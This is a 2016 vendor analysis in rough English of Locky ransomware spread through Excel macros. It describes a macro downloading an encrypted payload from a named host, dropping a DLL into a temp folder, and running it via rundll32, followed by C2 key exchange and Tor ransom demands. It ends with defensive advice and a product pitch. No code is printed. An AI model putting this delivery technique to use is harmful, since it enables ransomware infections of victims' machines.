the ransomware risk office files

THE RANSOMWARE RISKS IN OFFICE FILES

Published: 03.10.2016

2

Sinara Labs | www.sinaralabs.com | @Sinaralabs

CONTENTS

● Ransomware

● Why Macros ?

● Inadequecy of Cyber Security Technology ● An Example of a Malicuous Software Analysis

● General Solutions o Individual Solution Offers o Institional Solution Offers

http://www.sinaralabs.com/

https://twitter.com/sinaralabs

3


Ransomware

The Ransomware has become a nightmare for individuals and institutions for the last 2 years, previously found in September of 2013. It is a dangerous kind of trojan horse in the ransom category. Initially bound to Microsoft Windows operating systems, Ransomware has also been implemented for Android devices and Mac computers in the meantime.

Ransomware is basically transmitted by e-mail attachments, subsequently encrypts some of the file genres inside of disks that are in network. After, a user is told that encrypted files

wouldn’t be decrypted without paying the ransom.In other words it renders a cryptovirology attack that adversely affects the files, and postulate a ransom (payment) to reinstate i t. In

some sorts, when the ransom isn’t paid in the given time, it threatens that encrypted files wouldn’t be decrypted/restored.

In our country, ransomwares are the most commonly sprawled throughout the e-mails that contain fake electronic invoces. However, should be kept in mind that attackers continue to

develop new methods to infect the virus. In recent weeks, as a new way of infections, we see macros in Office files.

Note: You can reach ransomware survey here which is made for Turkey in particular..

Why Macro? The office files are used by account experts and information processors in business world to formulate and automize duties frequently applied. In the auspices of macros, because it is possible to run the code and instruction, the attackers typically use these means. The malicious codes(harmful macros) kept in excel, word and similar files could be employed to

infect with spyware to encrypt data and in return demand a ransom to pay.



4


Inadequacy of Cyber Security Technology

The practically known antivirus softwares and sandbox solutions are to a large extent get nowhere against new generation ransomwares. The biggest reason for this situation is that

new generation ransomwares have the capability to constantly change their digital signature cannot be recognised with signature-based and static analyses. Malicious software developers, malicious attackers can circumvent intuitive and behavior-

based automated analysis mechanisms with methods they have developed. In some cases, we see that these technologies can be late in discovering new malicious softwares.



5


An example of Ransomware

We share the analysis of an e-mail in our mailbox in the following example: In a title that you never expect or an individual you never expect from, you can receive an e-mail that you believe is in your interest. Such a malicious e-mail may seem (imitate) to be coming from an acquaintance or source that you expect! We begin our analysis with an e-mail trick by reminding that it is possible to send an e-mail on someone’s behalf.

Picture - A " an e-mail sample of attached malicious Excel file "



6


An example of a Malicious Software Analysis.

In general, a malware known as “Locky Ransomware” as it can be seen in Picture– A, is sent by an email to the victim. When the victim downloads the Excel file from an e-mail and runs

it, the macros in the Excel file becomes active and malware begins to work through macros.

In this example, it draws our attention that to make the file name convincing, when the file name being selected, a corporate name is entitled. Same as in the previous ransomware bill

virus examples we have seen that the bill names are carefully selected to enhance its credibility.

Picture- 1 “ To make the file name convincing, It has templates used in corporate environments.”

When we analyze the macro in picture -2, first it starts processing by downloading the

encrypted payload to computer via an Internet server.



7


Picture - 2 "Download address of the malicious code fragments"

Due to the functionality of the macro, Office files in Excel or in Word format had already turned into the most effective source of abuse used in cyber-attacks . When we examine the macros in malicious Excel files it attracts our attention that the encrypted content decrypted and run by downloading from the Internet.

Malicious software developer didn’t use code obfuscation for this case . As you can see in Picture – 2, part of this code is downloading malware stage which encrypts your data from

nutrahacks.com then runs it.The person writes malicious macro code, downloads a piece of code to encrypt files on a victim's computer and then runs by decrypting it.



8


Picture - 3 "Lucky macro at first downloads the piece of code in encrypted form."

Downloaded malicious content is named as siluans.dll after being resolved in the DLL file format to the %USERPROFILE%\temp folder. We see that it is a standard method that ransomware malware uses and with this injection method the encryption process initiated in pictures 4 and 5.

Picture-4 “ Injection method”



9


Picture - 5 “DLL Injection Method”

We see that malicious macro code those are contained in an Excel file passes into another phase in Picture - 6. With DLL file’s macro assistance which is required for Locky

Ransomware, by using Rundll32.exe file qwerty function is being called.

Resim - 6 “Rundll32.exe qwerty function”

When we analyze Siluans.dll file, its command control server for accessing encryption keys

and File I / O activity performed during encryption process might be seen in the following Pictures as well as in the Pictures 7, 8, and 9.



10


Picture - 7 "Key access"

Picture- 8 “Encrypted files are written back to disk with a singular sequence number and odin attachment”



11


We see that the person who has made up the malware using the singular sequence number, that is to say, with per file charge alternative, improves the restoring functions.

Picture- 9 “A plain-text channel is preferred for encripton key”

In Picture-9 we see that a plain-text channel is preferred for encryption key. In short, we can

say that it does not need an additional layer of security for the encryption key.



12


Picture- 10 “The standart welcome screen is seen after encryption process”

In Picture-10 the welcome screen is seen after encryption process has been completed. We determined how Ransomeware malware act with the macro in Excel file, how the piece of code is required for encryption from a server on the Internet and how Master Key is sent to the server by delivering a message to the victim after encryption is completed , and as always, how it demands a ransom.



13


Picture- 11 "We can only solve our encrypted files via a channel established with tor browsers path."

As it is seen in the content of the message, in order to decrypt, the attacker lists ransom payment routines under the Tor network.



14


Solution proposals

In short, as the result of the analysis of the Ransomware we offer both individual and

institutional solutions to your attention.

individual solutions

● We recommend you to tense up your antispam or antivirus protection, taking into

account that these attacks are mainly carried out via e-mail or similar attacks. ● Use intuitive Logger in your personal computer

● Neutralize the macros for Office files that you do not trust the source ● Do not open attachments from people you do not know!

● Be in a a similar approach against suspicious invoice, or cargo headed emails.

institutional solutions

● Intensify your antispam gateway solution and apply it against known ransomware

threats. ● Measure your employees against these phishing attacks and similar tests,then give

some training for specific individuals and groups. ● Randsomeware domain intelligence is a healthy solution to prevent the risk.

Incontrovertibly take advantage of similar services.



15


About Sinara Labs

Sinara Labs, which develops itself against a new generation of phishing attacks, security products is a security solution that tests security products and increases the awareness of information securi ty of corporate employees

To measure the level of knowledge of your employees, Sinara Labs contains more than a hundred scenarios. Against cybercriminals who want to seize sensitive data and user privileges of Institutions, Sinara Labs provides testing of defence systems by creating spesific reports to IT managers, It provides significant success against goal oriented attacks.

With Sinara Labs using dozens of unrelated scenario, phishing tests can be performed for your corporate employees, and a separate application can be made for each department. Every phishing test results are reported in detail will allow you to take action for your weaknesses.

Thanks to the Sinara Labs you can make simulation tests with real scenarios such as identity theft, personal security data and to the high-risk spot to access to critical systems in which sensi tive data located, and create awareness against attacks.

Sinara Labs was produced as a national software in 2014 and started to be used in critical sectors such as finance, energy, telecom and in the most important institutions of our country,

For more information you can contact us by [email protected] e-mail.



mailto:[email protected]